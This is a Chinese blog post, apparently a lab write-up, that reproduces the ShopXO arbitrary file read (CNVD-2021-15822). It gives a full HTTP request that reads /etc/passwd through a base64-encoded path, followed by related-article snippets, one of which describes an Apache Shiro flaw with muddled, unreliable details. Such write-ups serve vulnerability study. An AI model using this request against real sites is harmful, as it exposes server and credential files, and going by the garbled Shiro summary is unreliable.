shopxo 文件读取(CNVD-2021-15822)

最新推荐文章于 2025-03-12 15:26:37 发布
最新推荐文章于 2025-03-12 15:26:37 发布
阅读量1.2w 收藏 3
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞 文章标签: shopxo 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_48985780/article/details/122218091
本文揭示了开源电商系统ShopXO存在的文件读取漏洞,详细讲解了漏洞环境搭建、复现步骤、抓包分析,并提供官方补丁修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

shopxo 文件读取(CNVD-2021-15822)

漏洞介绍:

ShopXO是一套开源的企业级开源电子商务系统。 ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息

影响范围:

ShopXO版本

环境搭建:

在线环境 地址

漏洞复现:

访问首页

进行burp抓包

 

将要访问的文件进行编码 

构造poc 

GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: vulfocus.fofa.so:40398
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1635834194,1635834251; grafana_session=4ed2fe8aecc214c9bbb634d8399014fb; Hm_lvt_deaeca6802357287fb453f342ce28dda=1640670569; ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%2229814a38-17f9-413d-ad48-e704ca23ede6%22; PHPSESSID=jskl7f1mghrjlvsc8d7ctlt4j6; SECKEY_ABVK=dZF+HPOlvzzkwiS3ULsWzkjw4oNoZP3kMhRN02hlMEI%3D; BMAP_SECKEY=a52c397851ec0df6cb484b1d2c453acc49624b58896cb16fca4c15a2a5a330f41d048e40401107e5d699a5592f90abea5c64379815179d8bc02cbfd533f1c2784e84874764b6b40a032b23dbff4e931ed7413db121a2b52266f9290f239991ecce81595bf8b1ec1c3add56d6d7a9d1b87690ec447ec7359de0c799eafbaff605e058b6494a4df2b0d9b55365d4e0a5a8f6b1e541f01e99cd55369bee3dcc7f4a4a21514067b0064068c73d6609ca9562f3eea532cb3189fee339388c1217e1fd5075f080068a7657f15896598309cee7485b7219a70ca86d2017448104c526a28b2c55819909c6bc522a500f62c70c80
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 2

 访问,获得文件内容

 漏洞修复:

根据官方进行下载补丁修复

【漏洞复现】ShopXO任意文件读取漏洞
晚风不及你
03-04 2479
ShopXO是一套开源的企业级开源电子商务系统,包含PC、H5、微信小程序、支付宝小程序、百度小程序等多个终端,遵循Apache2开源协议发布,基于ThinkPHP5.1框架研发。该系统具有求实进取、创新专注、自主研发、国内领先企业级B2C电商系统解决方案等特点,可满足99%的电商运营需求。
ShopXO download 任意文件读取
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
10-14 728
道虽远,行则易至;儒虽难,坚为易成
ShopXO文件读取(CNVD-2021-15822)
m0_65150886的博客
01-22 1496
ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。3.将要访问的文件进行base64编码 ,我这里选取的是/etc/passwd。1.访问http://ip:port,出现如下页面,开始实验。4.修改get请求,读取/etc/passwd。2.使用burp抓取页面的包,并发至重发器。
[文件读取]shopxo 文件读取CNVD-2021-15822
wj33333的博客
11-14 1334
描述: ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。s=/index/qrcode/download/url/+文件base64。将/etc/passwd转为base64编码lh。将/tmp/flag转为base64编码。将要访问的文件进行编码。
【vulfocus复现】shopxo文件读取
MXPXT的博客
12-29 6617
vulfocus-shopxo文件读取入门1.命令执行漏洞2.目录浏览漏洞初级1.shopxo 文件读取CNVD-2021-15822) 入门 1.命令执行漏洞 打开后命令执行一句话直接给出,复制粘贴即可 2.目录浏览漏洞 描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置文件等,攻击者利用该信息可以更容易得到网站权限,导致网站被黑。 风险:攻击者通过访问网站某一目录时,该目录没有默认首页文件
任意文件读取与下载漏洞
qq_48550824的博客
08-07 350
详见链接
solly0880#wiki#若依管理系统 后台任意文件读取 CNVD-2021-019311
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app=
Thinkergod#PeiQi-WIKI-POC#若依管理系统 后台任意文件读取 CNVD-2021-019312
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app=
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
houyusen#poc#ShopXO v1.8.0 后台getshell1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
锐捷 RG-S6800E产品简介
03-05
RG-S6800E系列多业务万兆核心路由交换机提供2.4T/1.2T背板带宽,并支持将来扩展到4.8T/2.4T的能力,高达857Mpps/428Mpps的二/三层包转发速率可为用户提供高速无阻塞的数据交换,强大的交换路由功能、安全智能技术可同锐捷各系列交换机配合,为用户提供完整的端到端解决方案,是大型网络核心骨干和大流量节点交换机的理想选择。
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
亿赛通电子文档安全管理系统-rce-exp_CNVD-2021-26058.zip
09-01
亿赛通电子文档安全管理系统-rce-exp_CNVD-2021-26058
【春秋云镜】CVE-2021-41938-ShopXO CMS 2.2.0. 后台管理页面存在任意文件上传漏洞
HMX404的博客
01-29 857
ShopXO CMS 2.2.0. 后台管理页面存在任意文件上传漏洞。
cl.xoas.pw index.php,shopxo代码审计
weixin_34005314的博客
04-01 648
由于工作原因,分析了很多的cms也都写过文章,不过觉得好像没什么骚操作都是网上的基本操作,所以也就没发表在网站上,都保存在本地。最近突然发现自己博客中实战的东西太少了,决定将以前写的一些文章搬过来,由于当时写的初4是给自己留个记录,以后方便查看,所以写的都很简单,只有代码审计和复现,没有详细写挖掘中遇到的一些坑。以后写的文章中会尽量写详细的-----------------------------...
渗透测试|shopXO后台全版本获取Shell复现
qq_45521281的博客
05-29 6841
shopxo是一款开源的企业级商城系统,基于thinkphp5框架开发。这几天做了“[GKCTF2020]老八小超市儿”这道题,学到了后台获取shell的一个技巧,所以在这里复现一下。 提供一个搜索语法:title=“ShopXO企业级B2C电商系统提供商”(不要干坏事哦) 渗透测试复现 页面来自buuctf——[GKCTF2020]老八小超市儿。ShopXO全版本getshell流程走起: 进入题目(网上随便可以通过搜索找到一个使用shopxo搭建的演示站) 别的漏洞没找到,尝试访问默认登陆后台,后台页
ShopXO商城系统文件上传0Day代审历程
土豆的博客
09-05 2615
这两天攻防中,某政局内网横向发现多网段服务器,该服务器搭建了ShopXO商城系统(后来发现是开发临时搭建的,准备做二开用的)。结果花了30来秒审了个垃圾Day拿下该服务器,本文就是给新手提供思路(没交cnvd,懒)
任意文件读取/下载漏洞及攻防详解
最新发布
Kangyan6的博客
03-12 1985
任意文件读取/下载漏洞,是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。由于一些网站的需求,可能会提供文件查看与下载的功能,如果不对目标文件做限制,就可以查看或下载任意文件。总体来说,任意文件下载漏洞的利用主要是为了信息收集,我们通过对服务器敏感文件的下载,获取到大量的配置信息、源码,从而根据获取的信息来进一步挖掘服务器漏洞从而入侵。然后逐个下载我们需要审计的代码文件,如果文件没有被解析,显示的是文件源代码,就说明是任意文件读取与下载(目录穿越,目录穿透)漏洞。
CNVD-2021-15528
02-26
### CNVD-2021-15528 漏洞详情 CNVD-2021-15528 是针对 Apache Shiro 的反序列化远程代码执行漏洞。此漏洞允许未经身份验证的攻击者发送特制请求来触发 Java 反序列化过程中的代码执行,从而完全控制目标服务器。 #### 影响范围 该漏洞主要影响使用了 Apache Shiro 进行会话管理的应用程序,特别是当应用程序启用了 RememberMe 功能时更为危险。具体受影响版本包括但不限于: - Apache Shiro 1.2.x 至 1.7.x 版本 #### FOFA 查询语句 为了帮助安全研究人员定位可能存在风险的服务实例,提供了如下 FOFA 查询条件: ```plaintext "title="Shiro Session Manager"" ``` #### 漏洞复现环境搭建 要重现这个漏洞,通常需要满足以下几个前提条件: - 应用程序开启了 RememberMe 功能; - 攻击者能够获取到有效的 rememberMe cookie 值; - 存在一个可被利用的对象图导航语言 (OGNL) 表达式注入点[^1]。 ### 安全公告 国家信息安全漏洞共享平台(CNVD)于 2021 年发布了有关此漏洞的通知,并强调其严重性和潜在危害。鉴于该漏洞可能带来的严重影响以及广泛的存在性,强烈建议所有相关方尽快采取行动以减轻风险。 ### 补丁与修复方法 对于存在此类安全隐患的产品和服务提供商而言,最直接有效的方式就是升级至不受影响的新版软件。Apache 官方已经意识到这个问题,在后续发布的版本中解决了这一缺陷。因此推荐的做法是: - 升级到最新的稳定发行版,如 Apache Shiro 1.8 或更高版本。 如果无法立即完成上述操作,则应考虑实施临时缓解措施,比如禁用 RememberMe 功能或将 OGNL 解析器设置为只读模式等策略。 另外,还可以通过配置 Web Application Firewall(WAF) 来阻止可疑流量进入系统内部网络区域,以此作为额外一层防护手段[^2]。 ```bash # 更新依赖库至最新版本 mvn install -U ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值